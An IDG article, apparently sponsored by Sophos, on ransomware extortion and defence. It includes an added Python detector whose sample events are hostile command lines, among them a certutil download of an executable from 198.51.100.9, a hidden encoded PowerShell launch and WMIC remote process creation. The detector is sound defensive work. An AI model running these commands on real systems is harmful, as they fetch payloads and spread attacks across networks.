Understanding and defeating ransomware is about following the money

Image: A coin-operated lock ransoming an encrypted system. (The Lightwriter / Getty Images)

Businesses face a wide range of different cybersecurity threats. While denial of service, phishing, credential theft, business email compromise and others are significant, ransomware has evolved to become a massive problem with criminals boosting the danger through a secondary extortion market.

As well as encrypting files and demanding a ransom for the keys to release a business's information, some ransomware gangs also steal data and threaten to release it into the public domain in order to increase the pressure on victims to pay. Ransomware families such as Doppelpaymer, REvil, Clop, DarkSide, Netwalker, Ragnar Locker and Conti engage in this practice and ‘leak’ the data on their websites; REvil brazenly puts the data up for sale directly from its website.

The Sophos State of Ransomware 2020 report found that almost half (48%) of Australian organisations had experienced a ransomware attack in the previous 12 months, with data encrypted in eight in 10 (81%) of the attacks that successfully breached an organisation.

The average global cost of addressing the impact of such an attack, including business downtime, lost orders, operational costs, and more, but not including the ransom, was US$730,000. This average cost rose to US$1.4 million, almost twice as much, when organisations paid the ransom.

Aaron Bugal, the Global Solutions Engineer at Sophos, says “Ransomware doesn’t discriminate. Every organisation is a target, regardless of size, sector, or geography. And the ransom amounts are not fixed. Attackers vary them based on what they believe the victim can pay.”

The attackers look at this as a business transaction with an ROI. They will weigh up the cost of spending weeks or months to attack a large business with sophisticated defences against an easy win of a few hundred dollars for an hour or two of work.

“These attacks are executed by skilled and motivated criminals with one key goal in mind – money. Cybercrime gangs often use public resources of information like search engines, open-source intelligence tools and previously exposed data to identify targets they believe will be easy to attack and have the capacity to pay,” Mr Bugal explains.

A well-crafted phishing email is sent to a tight group of intended victims in the hope they’ll let the attacker in by downloading a file with malware, providing login credentials or inadvertently opening some other door that allows the attacker to breach defences.

In some cases, threat actors use previously stolen credentials or exploit vulnerable remote access gateways to gain access to a network. One of the most recent examples of a vulnerability exploited for attack is the Hafnium assault on on-premises Exchange servers. While the hacking group Hafnium started the ball rolling, other cybercriminals were quick to follow suit, and ransomware such as DearCry was seen being executed through the same vulnerability soon after.

Once an attacker is inside your network, they will try to remain undetected for as long as possible while they conduct reconnaissance, exfiltrate data and work out how to maximise their payday. Often they will use tools that legitimate IT administrators depend on, such as PowerShell, the Windows Management Instrumentation Command-line (WMIC) and Certutil, to blend in with normal activity.
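Because these tools are legitimate, detection has to look at how they are used rather than whether they run at all. The following is an added example (not code from the article or from Sophos) that applies simple rules to constructed process-creation records, in the shape of a parent image, image and command line, and groups the resulting alerts by host; all hosts, paths and command lines are made up for illustration.

```python
# Added example: flag "living off the land" use of PowerShell, WMIC and
# certutil in constructed process-creation records (hypothetical hosts/paths).
import re

# Constructed sample events; the fifth is a benign certutil run for contrast.
SAMPLE_EVENTS = [
    {"host": "WS-17", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"host": "WS-17", "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA..."},
    {"host": "SRV-02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.9/update.txt u.exe"},
    {"host": "SRV-02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic /node:"FS-01" process call create "cmd.exe /c ..."'},
    {"host": "DC-01", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify server.cer"},
]

# (rule name, image pattern, command-line pattern). The combination matters:
# certutil verifying a certificate is routine, certutil fetching a URL is not.
RULES = [
    ("certutil_remote_fetch", r"certutil\.exe$", r"-urlcache|-decode"),
    ("wmic_remote_process_create", r"wmic\.exe$", r"/node:.*process\s+call\s+create"),
    ("powershell_encoded_hidden", r"powershell\.exe$", r"-enc\b|-w\s+hidden"),
]
OFFICE_PARENTS = re.compile(r"(WINWORD|EXCEL|POWERPNT|OUTLOOK)\.EXE$", re.I)
SHELLS = re.compile(r"(powershell|cmd|wscript|cscript)\.exe$", re.I)

def classify(event):
    """Return the rule names an event triggers (empty list = nothing seen)."""
    hits = [name for name, image_re, cmd_re in RULES
            if re.search(image_re, event["image"], re.I)
            and re.search(cmd_re, event["cmdline"], re.I)]
    # A shell launched by an Office application is the classic trace of a
    # malicious attachment opened from a phishing email.
    if OFFICE_PARENTS.search(event["parent"]) and SHELLS.search(event["image"]):
        hits.append("office_spawned_shell")
    return hits

def triage(events):
    """Group triggered rules by host so responders know where to contain first."""
    alerts = {}
    for ev in events:
        for rule in classify(ev):
            alerts.setdefault(ev["host"], []).append(rule)
    return alerts

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, rules)
```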

The key to protecting your business from a ransomware attack is to have both proactive and reactive defensive measures in place, says Mr Bugal.

“Proactive security with 24/7 monitoring by both automated software and threat hunting experts is key to quickly and effectively identifying, investigating, and mitigating anomalous behaviour. Services such as Sophos Managed Threat Response combine the best tools with the most experienced threat hunters to help identify and neutralise active threats, limit recurrence, and minimise the chance of ransomware taking hold of your business assets.” 

Staff education is also key. Regular user education to help them identify what does not look right and making it easy to report anything from a suspicious email to an application performing unusually is critical.

If an attacker does make it past your defences, all is not lost, adds Mr Bugal.

“If you think you are under a ransomware attack, you need to contain and neutralise. Once you have stopped the spread, assess the damage,” says Mr Bugal.

Look at what you have lost, and which endpoints, servers and operating systems were affected. Check that your backups are safe and, if they are intact, make an offline copy immediately. Assess which machines were not affected as they’ll be critical in getting you back on your feet.

Expert assistance in repairing the damage and mitigating the risk of further attacks is also important.

“Services such as Sophos Rapid Response offer specialist incident response to help organisations neutralise an active attack and conduct post-incident analysis to assess what happened and mitigate against further risk,” says Mr Bugal.

Ransomware is a significant risk for all businesses. For criminals, the equation is simple: where will they get the greatest ROI? Businesses need to be proactive in their defences, be prepared should those defences be breached, and have a trusted partner they can call on for help should they suffer an attack.

Copyright © 2021 IDG Communications, Inc.